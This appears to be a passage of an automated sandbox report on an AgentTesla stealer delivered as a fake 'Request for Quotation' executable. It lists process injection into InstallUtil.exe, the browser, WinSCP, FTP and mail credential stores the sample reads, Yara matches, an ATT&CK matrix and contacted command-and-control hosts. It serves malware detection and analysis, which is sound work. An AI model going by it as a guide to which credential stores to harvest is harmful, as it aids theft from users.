                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2154832609.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2329828264.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2316892322.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2435925131.0000000005D89000.00000004.00000020.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2418094302.0000000001034000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3401732424.0000000005A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 710000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7D2008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 866008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 710000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 712000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 74C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 74E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45D008Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation-537262227-04.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Users\user\AppData\Roaming\Oltpxw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Users\user\AppData\Roaming\Oltpxw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3367618614.0000000002647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2323828873.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2422576609.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation-537262227-04.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 2516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2172, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 1524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5456, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2323828873.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2422576609.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation-537262227-04.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 2516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2172, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 1524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5456, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3367618614.0000000002647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2323828873.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2422576609.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation-537262227-04.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 2516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2172, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 1524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5456, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credentials in Registry                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		1
                    Software Packing                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets12
                    Virtualization/Sandbox Evasion                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530631 Sample: Request for Quotation-53726... Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 30 ftp.alternatifplastik.com 2->30 32 rubberpartsmanufacturers.com 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 9 other signatures 2->52 7 Request for Quotation-537262227-04.exe 16 4 2->7         started        12 Oltpxw.exe 14 2 2->12         started        14 Oltpxw.exe 2 2->14         started        signatures3 process4 dnsIp5 34 rubberpartsmanufacturers.com 103.191.208.122, 443, 49704, 49728 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 7->34 24 C:\Users\user\AppData\Roaming\Oltpxw.exe, PE32 7->24 dropped 26 C:\Users\user\...\Oltpxw.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Injects a PE file into a foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Multi AV Scanner detection for dropped file 12->60 62 Machine Learning detection for dropped file 12->62 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49705, 49706 ALASTYRTR Turkey 16->28 36 Queries 